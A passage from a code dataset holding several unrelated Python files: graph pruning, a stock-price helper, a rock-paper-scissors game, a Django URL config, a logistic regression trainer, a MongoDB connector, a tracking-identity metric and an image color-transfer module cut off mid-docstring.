\"\"\"\n Get the information necessary to prune a graph (or subgraph).\n :param nodes: list of all node IDs (ints) in cluster.\n :type nodes: collections.Sequence[int]\n :param edges: list (iterator will work) of all edges, in the form\n (nodeID_1, nodeID_2, weight). Edges with a node ID that is\n not in `nodes` will be ignored.\n :type edges: collections.Iterable[(int, int, float)]\n :param algo: shaving algo to use (from ALGORITHMS)\n :type algo: str\n :return: list of node IDs sorted from least dense to most dense\n :rtype: tuple[int]\n \"\"\"\n n = len(nodes)\n\n # get a reverse dict for old IDs (elements of `nodes`) to new IDs (indices\n # of `nodes`). 
ID conversion is required so the graph can be\n # represented in a matrix.\n new_ids = {old_id: i for i, old_id in enumerate(nodes)}\n\n rows = list()\n cols = list()\n data = list()\n for id1, id2, weight in edges:\n try:\n new_id1 = new_ids[id1]\n new_id2 = new_ids[id2]\n except KeyError:\n continue # edge is not within subgraph; ignore it\n\n # TODO: if edges already contains both directions, bidirectional edges\n # TODO: do not need to be added here for each edge\n\n rows.append(new_id1)\n cols.append(new_id2)\n data.append(weight)\n\n rows.append(new_id2)\n cols.append(new_id1)\n data.append(weight)\n\n graph = csr_matrix((data, (rows, cols)), shape=(n, n), dtype=np.float16)\n\n # sort the new IDs by density, and convert back to old IDs\n return tuple(nodes[i] for i in _ALGORITHM_FUNCTIONS[algo](graph))\n\n\ndef _get_density_sorted_graph_1(graph):\n \"\"\"\n :param graph: square matrix representing graph\n :type graph: scipy.sparse.csr_matrix\n :return: A list of indices of the matrix that represents `graph` (each\n index represents a point) sorted from lowest density to highest\n density using node flow.\n \"\"\"\n n = graph.shape[0]\n\n flow_graph = _get_flow_graph(graph)\n\n # calculate sum of flow of all edges for each point (by summing the rows of\n # the flow matrix)\n node_densities = np.array(flow_graph.sum(axis=1).flat)\n\n sort_indices = node_densities.argsort()\n\n sorted_nodes = [None] * n\n for point_id, sort_index in enumerate(sort_indices):\n sorted_nodes[sort_index] = point_id\n\n return sorted_nodes\n\n\ndef _get_density_sorted_graph_2(graph):\n \"\"\"\n :param graph: square matrix representing graph\n :type graph: scipy.sparse.csr_matrix\n :return: A list of indices of the matrix that represents `graph` (each\n index represents a point) sorted from lowest density to highest\n density by incrementally shaving by node flow.\n \"\"\"\n flow_graph = _get_flow_graph(graph)\n\n # calculate sum of flow of all edges for each point (by summing the rows of\n # the flow matrix)\n node_densities = dict(enumerate(flow_graph.sum(axis=1).flat))\n\n sorted_nodes = list()\n while node_densities:\n least_dense_node = min(node_densities, key=node_densities.get)\n\n sorted_nodes.append(least_dense_node)\n\n del node_densities[least_dense_node]\n\n # all nodes connected to the least dense node\n connected_nodes = graph[least_dense_node].nonzero()[1]\n\n for node_1, node_2 in itertools.combinations(connected_nodes, 2):\n flow = graph[node_1, node_2]\n\n if node_1 in node_densities:\n node_densities[node_1] -= flow\n if node_2 in node_densities:\n node_densities[node_2] -= flow\n\n assert not node_densities\n\n return sorted_nodes\n\n\n_ALGORITHM_FUNCTIONS = {\n \"1\": _get_density_sorted_graph_1,\n \"2\": _get_density_sorted_graph_2\n}\n","sub_path":"python/graphHDS/prune_cluster.py","file_name":"prune_cluster.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"312847766","text":"from yahoo_finance import Share\nfrom pprint import pprint\n\ndef current_price_stock(name):\n stock = Share('{}'.format(name))\n return stock.get_price()\n\ndef current_time_stock(name):\n stock = Share('{}'.format(name))\n return stock.get_trade_datetime()\n\ndef price_change(name, beginning, ending):\n stock = Share('{}'.format(name))\n history_list = stock.get_historical(beginning, ending)\n length_of_days = len(history_list)\n first_day_data = history_list[length_of_days - 1]\n last_day_data = history_list[0]\n 
first_day_price = first_day_data.get('Adj_Close')\n last_day_price = last_day_data.get('Adj_Close')\n fprice = float(first_day_price)\n lprice = float(last_day_price)\n return fprice - lprice\n\n","sub_path":"Skeleton/stock_info.py","file_name":"stock_info.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"243685552","text":"\nimport random\n\nrps = {\n\"rock\" : [\"paper\", \"scissors\", \"rock\"],\n\"paper\" : [\"scissors\", \"rock\", \"paper\"],\n\"scissors\" : [\"rock\", \"paper\", \"scissors\"]\n}\n\n# wins\n# rps[player[0]]\n\n# all keys\noptions = list(rps.keys())\n\ngame_in_session = \"yes\"\n\nprint(\"\\nWelcome to Rock, Paper, Scissors!\")\n\nwhile game_in_session == \"yes\":\n player = input(\"\\nMake your selection; Rock, Paper, or Scissors: \").lower()\n\n computer = random.choice(list(rps.keys()))\n print(f\"The computer has chosen: {computer}.\\n\")\n if computer == rps[player][0]:\n print(\"You lose.\")\n elif computer == rps[player][1]:\n print(\"You win.\")\n elif computer == rps[player][2]:\n print(\"You tied.\")\n else:\n print(\"Error\")\n\n game_in_session = input(\"\\nDo you want to play another game? \").lower()\nelse:\n print(\"\\nThank you for playing.\")\n\n\n'''\ngame_in_session = \"yes\"\n\nprint(\"\\nWelcome to Rock, Paper, Scissors!\")\n\nwhile game_in_session == \"yes\":\n\n player = input(\"\\nMake your selection: Rock, Paper, or Scissors: \")\n\n computer = random.choice(rps)\n\n print(f\"The computer has chosen: {computer}\")\n\n if player is rps[0] and computer is rps[2]:\n print(\"You have lost.\")\n\n elif((player == \"Rock\" and computer == \"Scissors\") or (player == \"Paper\" and computer == \"Rock\") or (player == \"Scissors\" and computer == \"Paper\")):\n print(\"You have won.\")\n\n elif player == computer:\n print(\"You have tied.\")\n\n game_in_session = input(\"Do you want to play another game? 
\")\nelse:\n print(\"Thank you for playing.\")\n'''\n","sub_path":"Assignments/duncan/python/lab07_rps_game.py","file_name":"lab07_rps_game.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"201569893","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Turing'\n\nimport Tkinter as tk\n\nif __name__ == '__main__':\n msg = tk.Message(text=\"Oh by the way, which one's Pink?\")\n msg.config(bg=\"pink\", font=(\"times\", 16, \"italic\"))\n msg.pack(fill=tk.X, expand=tk.YES)\n tk.mainloop()\n","sub_path":"python/PP4E/Gui/Tour/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"562384708","text":"from django.conf.urls.defaults import *\n\n# admin enabled\nfrom django.contrib import admin\nadmin.autodiscover()\n\nnamespace = \"specialrequestchit\"\n\nurlpatterns = patterns('specialrequestchit.views',\n\n url(r'^$', 'specReq', name = \"specReq\"),\n (r'^/$', 'specReq'),\n (r'specReqSubmit$', 'specReqSubmit'),\n (r'specReqView$', 'specReqView'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # enabled the admin\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"fleet/src/cms/specialrequestchit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597143786","text":"import z3\n\n# This file contains global symbols for Intel pseudocode.\n# Basically, these are implementations of built-in functions that Intel doesn't\n# feel the need to specify apparently.\n\ndef POPCNT(bits, **kwargs):\n # This is a variable-width version of the classic 0x5555/0x3333/0x0f0f/0xffff\n # etc algorithm, to sum N bits in O(log2 N) steps\n shift = 1\n while shift < bits.size():\n mask = sum(1 << x for x in range(bits.size()) if not x & shift)\n bits = (bits & mask) + ((bits >> shift) & mask)\n shift *= 2\n return bits & ((1 << shift) - 1)\n\n# Should maybe handle this better...\ndef ZeroExtend(v, **kwargs):\n return v\n","sub_path":"intr_builtins.py","file_name":"intr_builtins.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"362044929","text":"# written by Jingfeng Xia, jxia@wpi.edu\n\nimport LR\nimport numpy as np\nimport math\n\ndef train(X, Y, alpha=0.01, n_epoch=100):\n # number of features\n p = X.shape[1]\n # number of classes \n c = int(max(Y))\n\n # randomly initialize W and b\n W = np.asmatrix(np.random.rand(c,p))\n b= np.asmatrix(np.random.rand(c,1))\n\n for _ in range(n_epoch):\n # go through each training instance\n for x,y in zip(X,Y):\n y = int(y)-1\n x = x.T # convert to column vector\n # Forward pass: compute the logits, softmax and cross_entropy \n (z,a,l) = LR.forward(x,y,W,b)\n # Back Propagation: compute local gradients of cross_entropy, softmax and logits\n (dL_da,da_dz,dz_dW,dz_db) = LR.backward(x,y,a)\n # compute the global gradients using chain rule\n dL_dz = LR.compute_dL_dz(dL_da,da_dz)\n dL_dW = LR.compute_dL_dW(dL_dz,dz_dW)\n dL_db = LR.compute_dL_db(dL_dz,dz_db)\n # update the paramters using gradient descent\n W = LR.update_W(W, dL_dW, alpha)\n b = LR.update_b(b, dL_db, alpha)\n return W, b\n\ndef predict(Xtest, W, b):\n n = 
Xtest.shape[0]\n    c = W.shape[0]\n    Y = np.zeros(n) # initialize as all zeros\n    P = np.asmatrix(np.zeros((n,c)))\n\n    for i, x in enumerate(Xtest):\n        x = x.T # convert to column vector\n#        print(type(x))\n        z = np.asmatrix(np.zeros(b.shape))\n        z = np.dot(W,x) + b\n        a = np.mat(np.zeros(z.shape))\n        for j in range(0,z.shape[0]):\n            a[j] = np.exp(z[j])\n        a /= np.sum(a)\n        Y[i] = np.argmax(a)+1\n        P[i] = a.T\n\n    return Y, P\n\ndef accuracy(test_y_or_train_y,Y):\n    true = 0\n    rows = Y.shape[0]\n    for i in range(0,rows):\n        if Y[i] == test_y_or_train_y[i]:\n            true+=1\n        else:\n            pass\n    accuracy = true/rows\n    return accuracy","sub_path":"server/ML/Model/train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"336560542","text":"#!/usr/bin/env python\n# coding:utf-8\nimport pymongo\nfrom pymongo import ASCENDING, DESCENDING\n\n# MongoDB connector\nclass Connector:\n    def __init__(self, dbName):\n        # DB credentials\n        user = 'sObjectDataAdmin'\n        pwd = 'Password01'\n        self.client = pymongo.MongoClient('mongodb://mongo:27017/')\n        # connect to the DB\n        self.db = self.client[dbName]\n        self.db.authenticate(user, pwd)\n        assert self.client is not None\n\n        #self.db.collection_names()\n        #print(str(self.db.name), flush=True)\n\n    def __del__(self):\n        print(\"__del__\", flush=True)\n        #self.client.close()\n\n    # check the collection, add an index\n    def checkCollection(self, collectionName, indexColumn):\n        self.collection = self.db[collectionName]\n        assert self.collection is not None\n        ## add the index\n        self.collection.create_index([(indexColumn, ASCENDING)])\n        print(\"Check Collection: \" + collectionName, flush=True)\n        print(str(self.collection.name) + ' records : ' + str(self.collection.find().count()), flush=True)\n\n    # drop a collection\n    def dropCollection(self, collectionName):\n        self.collection = self.db[collectionName]\n        assert self.collection is not None\n        print(\"Drop Collection: \" + collectionName, flush=True)\n        self.collection.drop()\n\n    # bulk-insert data\n    def insertBulkdata(self, collectionName, data):\n        if len(data) == 0:\n            print(\"No insert Collection: \" + collectionName, flush=True)\n            return \n        self.collection = self.db[collectionName]\n        assert self.collection is not None\n        print(\"Insert Collection: \" + collectionName, flush=True)\n        print(str(len(data)), flush=True)\n        ## insert the data\n        self.collection.insert_many(data)\n        #assert self.collection.count_documents({}) == len(data)\n\n        print(str(self.collection.name) + ' records : ' + str(self.collection.find().count()), flush=True)\n        return len(data)\n\n    ### queries\n    # fetch all documents\n    def getAlldata(self, collectionName):\n        self.collection = self.db[collectionName]\n        assert self.collection is not None\n        print(\"Get Collection: \" + collectionName, flush=True)\n        datas = [data for data in self.collection.find({}, {'_id': False})]\n        return datas\n\n    # search on a single condition\n    def searchSingleFilter(self, collectionName, Columns, value):\n        self.collection = self.db[collectionName]\n        assert self.collection is not None\n        print(\"Search Collection: \" + Columns + \"= \" + value, flush=True)\n        datas = [data for data in self.collection.find({Columns: value}, {'_id': False})]\n        return datas\n\n    # search within a date range\n    def searchDatePeriodFilter(self, collectionName, dateColumn, startDate, endDate):\n        self.collection = self.db[collectionName]\n        assert self.collection is not None\n        print(\"Search Collection: \" + startDate + \" - \" + endDate, flush=True)\n        dateFilter= {dateColumn :{\"$gte\": str(startDate), \"$lte\": str(endDate)}}\n        datas = [data for data in self.collection.find(dateFilter, {'_id': False}, sort = [(dateColumn, ASCENDING)])]\n        return datas\n\n    #### join search - build the column projection ############ \n    def makeColumnsProject(self, mainColumns, subColumns, subCollectionName):\n        columns = {}\n        # columns of the main collection\n        for column in mainColumns:\n            #print(str(column), flush=True)\n            columns[column] = \"$\" + column\n        # columns of the sub collection\n        for column in subColumns:\n            #print(str(column), flush=True)\n            columns[column] = \"$\" + subCollectionName + \".\" + column\n        # exclude the object id\n        columns[\"_id\"] = False\n        project={\"$project\": columns}\n        return project\n\n    #### join search - build the join rule ############ \n    def makeJoinLookup(self, mainCollection, subCollection):\n        lookup={\"$lookup\":\n            {\n            \"from\":subCollection[\"collection\"],\n            \"localField\": mainCollection[\"joinField\"],\n            \"foreignField\":subCollection[\"joinField\"],\n            \"as\":subCollection[\"collection\"]\n            }}\n        return lookup\n\n    #### join search \n    def joinsearchData(self, mainCollection, subCollection):\n        self.collection = self.db[mainCollection[\"collection\"]]\n        assert self.collection is not None\n        ## join rule\n        lookup = self.makeJoinLookup(mainCollection, subCollection)\n        ## unwind the sub collection array\n        unwind={\"$unwind\": \"$\"+subCollection[\"collection\"]}\n        ## project only the required columns\n        project=self.makeColumnsProject(mainCollection[\"columns\"], subCollection[\"columns\"], subCollection[\"collection\"])\n\n        print(\"lookup Info: \" + str(lookup), flush=True)\n        print(\"project Info: \" + str(project), flush=True)\n        datas = [data for data in self.collection.aggregate([lookup, unwind, project])]\n        return datas\n\n    #### join search with a date range\n    def joinsearchDataPeriod(self, mainCollection, subCollection,datePeriod):\n        self.collection = self.db[mainCollection[\"collection\"]]\n        assert self.collection is not None\n        ## join rule\n        lookup = self.makeJoinLookup(mainCollection, subCollection)\n        ## unwind the sub collection array\n        unwind={\"$unwind\": \"$\"+subCollection[\"collection\"]}\n        ## project only the required columns\n        project=self.makeColumnsProject(mainCollection[\"columns\"], subCollection[\"columns\"], subCollection[\"collection\"])\n\n        print(\"lookup Info: \" + str(lookup), flush=True)\n        print(\"project Info: \" + str(project), flush=True)\n\n        #dateFilter= {dateColumn :{\"$gte\": str(startDate), \"$lte\": str(EndDate)}}\n        dateFilter= {\"$match\": {datePeriod[\"dateColumn\"] :{\"$gte\": datePeriod[\"startDate\"], \"$lte\": datePeriod[\"endDate\"]}}}\n        print(\"dateFilter Info: \" + str(dateFilter), flush=True)\n\n        datas = [data for data in self.collection.aggregate([lookup, dateFilter, unwind, project])]\n        print(\"dateFilter Info: \" + str([lookup, dateFilter, unwind, project]), flush=True)\n        return datas\n\n    def pipelineQuery(self, CollectionName, pipeline):\n        self.collection = self.db[CollectionName]\n        assert self.collection is not None\n        datas = [data for data in self.collection.aggregate(pipeline)]\n        return datas","sub_path":"sfaDataeRplica/accessormongo/code/MongoConnector.py","file_name":"MongoConnector.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"80326778","text":"import numpy as np\nfrom scipy.optimize import linear_sum_assignment\nfrom ._base_metric import _BaseMetric\nfrom .. import _timing\nfrom .. import utils\n\n\nclass Identity(_BaseMetric):\n    \"\"\"Class which implements the ID metrics\"\"\"\n\n    @staticmethod\n    def get_default_config():\n        \"\"\"Default class config values\"\"\"\n        default_config = {\n            'THRESHOLD': 0.5,  # Similarity score threshold required for a IDTP match. 
Default 0.5.\n 'PRINT_CONFIG': True, # Whether to print the config information on init. Default: False.\n 'TRACK_IOU_THRESH': 0.2, # intersection of gt and pred tracks should be larger then this thresh. thresh is relative to pred track length\n }\n return default_config\n\n def __init__(self, config=None):\n super().__init__()\n self.integer_fields = ['IDTP', 'IDFN', 'IDFP']\n self.float_fields = ['IDF1', 'IDR', 'IDP']\n self.fields = self.float_fields + self.integer_fields\n self.summary_fields = self.fields\n\n # Configuration options:\n self.config = utils.init_config(config, self.get_default_config(), self.get_name())\n self.threshold = float(self.config['THRESHOLD'])\n self.track_iou_threshold = float(self.config['TRACK_IOU_THRESH'])\n\n @_timing.time\n def eval_sequence(self, data):\n \"\"\"Calculates ID metrics for one sequence\"\"\"\n # Initialise results\n res = {}\n for field in self.fields:\n res[field] = 0\n\n # Return result quickly if tracker or gt sequence is empty\n if data['num_tracker_dets'] == 0:\n res['IDFN'] = data['num_gt_dets']\n return self._compute_final_fields(res)\n if data['num_gt_dets'] == 0:\n res['IDFP'] = data['num_tracker_dets']\n return self._compute_final_fields(res)\n\n # Variables counting global association\n potential_matches_count = np.zeros((data['num_gt_ids'], data['num_tracker_ids']))\n gt_id_count = np.zeros(data['num_gt_ids'])\n tracker_id_count = np.zeros(data['num_tracker_ids'])\n\n # First loop through each timestep and accumulate global track information.\n for t, (gt_ids_t, tracker_ids_t) in enumerate(zip(data['gt_ids'], data['tracker_ids'])):\n # Count the potential matches between ids in each timestep\n matches_mask = np.greater_equal(data['similarity_scores'][t], self.threshold)\n match_idx_gt, match_idx_tracker = np.nonzero(matches_mask)\n potential_matches_count[gt_ids_t[match_idx_gt.tolist()].tolist(), tracker_ids_t[match_idx_tracker.tolist()].tolist()] += 1\n\n # Calculate the total number of dets for each gt_id and tracker_id.\n gt_id_count[gt_ids_t.tolist()] += 1\n tracker_id_count[tracker_ids_t.tolist()] += 1\n\n # Calculate optimal assignment cost matrix for ID metrics\n num_gt_ids = data['num_gt_ids']\n num_tracker_ids = data['num_tracker_ids']\n fp_mat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n fn_mat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n fp_mat[num_gt_ids:, :num_tracker_ids] = 1e10\n fn_mat[:num_gt_ids, num_tracker_ids:] = 1e10\n for gt_id in range(num_gt_ids):\n fn_mat[gt_id, :num_tracker_ids] = gt_id_count[gt_id]\n fn_mat[gt_id, num_tracker_ids + gt_id] = gt_id_count[gt_id]\n for tracker_id in range(num_tracker_ids):\n fp_mat[:num_gt_ids, tracker_id] = tracker_id_count[tracker_id]\n fp_mat[tracker_id + num_gt_ids, tracker_id] = tracker_id_count[tracker_id]\n fn_mat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n fp_mat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n\n # Hungarian algorithm\n match_rows, match_cols = linear_sum_assignment(fn_mat + fp_mat)\n\n # Accumulate basic statistics\n res['IDFN'] = fn_mat[match_rows, match_cols].sum().astype(np.int)\n res['IDFP'] = fp_mat[match_rows, match_cols].sum().astype(np.int)\n res['IDTP'] = (gt_id_count.sum() - res['IDFN']).astype(np.int)\n\n # Calculate final ID scores\n res = self._compute_final_fields(res)\n return res\n\n def combine_classes_class_averaged(self, all_res, ignore_empty_classes=False):\n \"\"\"Combines metrics across all classes by averaging over the class values.\n If 
'ignore_empty_classes' is True, then it only sums over classes with at least one gt or predicted detection.\n \"\"\"\n res = {}\n for field in self.integer_fields:\n if ignore_empty_classes:\n res[field] = self._combine_sum({k: v for k, v in all_res.items()\n if v['IDTP'] + v['IDFN'] + v['IDFP'] > 0 + np.finfo('float').eps},\n field)\n else:\n res[field] = self._combine_sum({k: v for k, v in all_res.items()}, field)\n for field in self.float_fields:\n if ignore_empty_classes:\n res[field] = np.mean([v[field] for v in all_res.values()\n if v['IDTP'] + v['IDFN'] + v['IDFP'] > 0 + np.finfo('float').eps], axis=0)\n else:\n res[field] = np.mean([v[field] for v in all_res.values()], axis=0)\n return res\n\n def combine_classes_det_averaged(self, all_res):\n \"\"\"Combines metrics across all classes by averaging over the detection values\"\"\"\n res = {}\n for field in self.integer_fields:\n res[field] = self._combine_sum(all_res, field)\n res = self._compute_final_fields(res)\n return res\n\n def combine_sequences(self, all_res):\n \"\"\"Combines metrics across all sequences\"\"\"\n res = {}\n for field in self.integer_fields:\n res[field] = self._combine_sum(all_res, field)\n res = self._compute_final_fields(res)\n return res\n\n @staticmethod\n def _compute_final_fields(res):\n \"\"\"Calculate sub-metric ('field') values which only depend on other sub-metric values.\n This function is used both for both per-sequence calculation, and in combining values across sequences.\n \"\"\"\n if res['IDFN'] != 0:\n res['IDR'] = res['IDTP'] / np.maximum(1.0, res['IDTP'] + res['IDFN'])\n else:\n res['IDR'] = 1\n if res['IDFP'] != 0:\n res['IDP'] = res['IDTP'] / np.maximum(1.0, res['IDTP'] + res['IDFP'])\n else:\n res['IDP'] = 1\n if res['IDFN'] != 0 or res['IDFP'] != 0:\n res['IDF1'] = res['IDTP'] / np.maximum(1.0, res['IDTP'] + 0.5 * res['IDFP'] + 0.5 * res['IDFN'])\n else:\n res['IDF1'] = 1\n return res\n\n\nclass TrackIdentity(Identity):\n @_timing.time\n def eval_sequence(self, data):\n \"\"\"Calculates ID metrics for one sequence\"\"\"\n # Initialise results\n res = {}\n for field in self.fields:\n res[field] = 0\n\n # Return result quickly if tracker or gt sequence is empty\n if data['num_tracker_dets'] == 0:\n res['IDFN'] = data['num_gt_ids']\n return res\n if data['num_gt_dets'] == 0:\n res['IDFP'] = data['num_tracker_ids']\n return res\n\n # Variables counting global association\n potential_matches_count = np.zeros((data['num_gt_ids'], data['num_tracker_ids']))\n gt_id_count = np.zeros(data['num_gt_ids'])\n tracker_id_count = np.zeros(data['num_tracker_ids'])\n\n # First loop through each timestep and accumulate global track information.\n for t, (gt_ids_t, tracker_ids_t) in enumerate(zip(data['gt_ids'], data['tracker_ids'])):\n # Count the potential matches between ids in each timestep\n matches_mask = np.greater_equal(data['similarity_scores'][t], self.threshold)\n match_idx_gt, match_idx_tracker = np.nonzero(matches_mask)\n potential_matches_count[gt_ids_t[match_idx_gt.tolist()].tolist(), tracker_ids_t[match_idx_tracker.tolist()].tolist()] += 1\n\n # Calculate the total number of dets for each gt_id and tracker_id.\n gt_id_count[gt_ids_t.tolist()] += 1\n tracker_id_count[tracker_ids_t.tolist()] += 1\n\n # Calculate optimal assignment cost matrix for ID metrics\n num_gt_ids = data['num_gt_ids']\n num_tracker_ids = data['num_tracker_ids']\n fp_mat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n fn_mat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + 
num_tracker_ids))\n fp_mat[num_gt_ids:, :num_tracker_ids] = 1\n fn_mat[:num_gt_ids, num_tracker_ids:] = 1\n for gt_id in range(num_gt_ids):\n fn_mat[gt_id, :num_tracker_ids] = gt_id_count[gt_id]\n fn_mat[gt_id, num_tracker_ids + gt_id] = 1.0 - 1e-6\n for tracker_id in range(num_tracker_ids):\n fp_mat[:num_gt_ids, tracker_id] = tracker_id_count[tracker_id]\n fp_mat[tracker_id + num_gt_ids, tracker_id] = 1.0 - 1e-6\n fn_mat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n fp_mat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n cost_matrix = fn_mat + fp_mat\n cost_matrix[:num_gt_ids, :num_tracker_ids] /= (cost_matrix[:num_gt_ids, :num_tracker_ids] + potential_matches_count)\n cost_matrix[num_gt_ids:, num_tracker_ids:] = 1\n\n # Hungarian algorithm for IDF1\n match_rows, match_cols = linear_sum_assignment(cost_matrix)\n match_mask = np.logical_and(match_rows < num_gt_ids, match_cols < num_tracker_ids)\n # pred tracks with relative iou to predicted track length lower then thresh are sent to FN\n re_assigned = np.sum(np.less_equal(potential_matches_count[match_rows[match_mask],\n match_cols[match_mask]] /\n tracker_id_count[match_cols[match_mask]],\n self.track_iou_threshold)) # relative to predicted track length intersection\n # Hungarian algorithm for track_IDF1\n res['IDFN'] = np.sum(np.logical_and(match_rows < num_gt_ids, match_cols >= num_tracker_ids)).astype(np.int) + re_assigned\n res['IDFP'] = np.sum(np.logical_and(match_rows >= num_gt_ids, match_cols < num_tracker_ids)).astype(np.int) + re_assigned # sent to sink pred tracks counts as FP\n res['IDTP'] = (num_gt_ids - res['IDFN']).astype(np.int)\n\n # Calculate final ID scores\n res = self._compute_final_fields(res)\n return res\n\n def combine_sequences(self, all_res, average: str = \"macro\"):\n \"\"\"Combines metrics across all sequences\"\"\"\n res = {}\n for field in self.integer_fields:\n res[field] = self._combine_sum(all_res, field)\n\n if average == \"micro\":\n res = self._compute_final_fields(res)\n elif average == \"macro\":\n for field in self.float_fields:\n res[field] = np.mean([all_res[k][field] for k in all_res.keys()]).astype(float)\n else:\n raise ValueError(f\"Unexpected average value: {average}\")\n return res\n","sub_path":"trackeval/metrics/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":11267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"465990970","text":"\"\"\"\nbrief: change color through normalization (changing mean, std)\nauthor: lzhbrian (https://lzhbrian.me)\ndate: 2019.4.24\nusage:\n\n import cv2\n import numpy as np\n import matplotlib.pyplot as plt\n from PIL import Image\n\n from get_mask import get_mask\n from color_changer import color_transfer_wrapper\n\n img_path = './data/img.png'\n img_mask_path = './data/img.json'\n target_color_img_path = './data/color.jpg'\n target_color_img_mask_path = './data/color.json'\n\n img = np.array(Image.open(img_path).convert('RGB'))\n img_mask = get_mask(img_path, img_mask_path)\n target_color_img = np.array(Image.open(target_color_img_path).convert('RGB'))\n target_color_img_mask = get_mask(target_color_img_path, target_color_img_mask_path)\n\n img_transformed = color_transfer_wrapper(img, target_color_img,\n cv2.COLOR_RGB2LAB, cv2.COLOR_LAB2RGB,\n image_mask=img_mask,\n target_color_image_mask=target_color_img_mask,\n calc_channel=[True, True, True])\n\n img_transformed_pil = Image.fromarray(img_transformed)\n img_transformed_pil.save('output.png')\n\n 
plt.figure(figsize=(20, 8))\n plt.subplot(151); plt.imshow(img); plt.title('image'); plt.axis('off')\n plt.subplot(152); plt.imshow(img_mask); plt.title('mask'); plt.axis('off')\n plt.subplot(153); plt.imshow(target_color_img); plt.title('target color'); plt.axis('off')\n plt.subplot(154); plt.imshow(target_color_img_mask); plt.title('target color mask'); plt.axis('off')\n plt.subplot(155); plt.imshow(img_transformed); plt.title('transformed'); plt.axis('off')\n plt.tight_layout()\n plt.savefig('output_concat.png')\n\"\"\"\n\nimport os\nimport sys\nimport json\nfrom glob import glob\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('Agg')\nfrom PIL import Image\nimport cv2\nimport numpy as np\n\ndef color_transfer(image, image_mask,\n target_mean, target_std,\n calc_channel=[True, True, True],\n DEBUG=False):\n \"\"\"\n transfer target color to image\n :param image: image image, a numpy array, HxWx3, may be RGB or LAB or HSV or ...\n :param image_mask: mask, a numpy array, HxW, 0 or 255, uint8\n :param target_mean: mean of each channel [c1, c2, c3], list, type is consistent with image (e.g. RGB)\n :param target_std: std of each channel [c1, c2, c3], list, type is consistent with image (e.g. RGB)\n :param calc_channel: if False in certain dim, skip that channel\n :return image_transfered: color transfered image, a numpy array, type is consistent with image (e.g. RGB)\n \"\"\"\n\n # calculate image mean, std of each channel, given mask\n # https://www.reddit.com/r/learnpython/comments/9gyg6h/image_processing/\n # image_mask is a 0 or 255 HxW np.array uint8\n # mean, std is 3x1 np.array\n image_mean, image_std = cv2.meanStdDev(image, mask=image_mask)\n\n # skip certain channel\n image_mean = np.squeeze(image_mean) * calc_channel\n target_mean = np.squeeze(target_mean) * calc_channel\n\n image_std = np.squeeze(image_std)\n target_std = np.squeeze(target_std)\n for c in range(3):\n if calc_channel[c] == False:\n image_std[c] = 1\n target_std[c] = 1\n\n # check\n image_mean = np.squeeze(image_mean)[np.newaxis, np.newaxis, :]\n image_std = np.squeeze(image_std)[np.newaxis, np.newaxis, :]\n if DEBUG:\n print(image_mean, image_std)\n target_mean = np.squeeze(target_mean)[np.newaxis, np.newaxis, :]\n target_std = np.squeeze(target_std)[np.newaxis, np.newaxis, :]\n if DEBUG:\n print(target_mean, target_std)\n\n # if only a color, then std would be 0, the result will be disgusting\n # if np.sum(target_std) == 0:\n # target_std += 10\n\n target_std[target_std == 0] = 10\n image_std[image_std == 0] = 10\n\n\n image_transformed = (image - image_mean) / np.sqrt(image_std) * np.sqrt(target_std) + target_mean \n image_transformed = image_mask[:, :, np.newaxis] / 255 * image_transformed + \\\n (1 - image_mask[:, :, np.newaxis] / 255) * image\n\n image_transformed = np.clip(image_transformed, 0, 255)\n return image_transformed.astype(np.uint8)\n\n\ndef color_transfer_wrapper(image, target_color_image,\n protocol, protocol_reverse,\n image_mask=None,\n target_color_image_mask=None,\n calc_channel=[True, True, True]):\n \"\"\"\n wrapper for color_transfer function\n will calc target_color_image's mean, std and convert it to image given image_mask\n\n :param image: image image, a numpy array, HxWx3, may be RGB or LAB or HSV or ...\n :param image_mask: mask, a numpy array, HxW, 0 or 255, uint8\n if not given, change all image\n :param target_color_image: a numpy array, HxW, 0 or 255, uint8\n :param target_color_image_mask: a numpy array, HxW, 0 or 255, uint8\n :param 
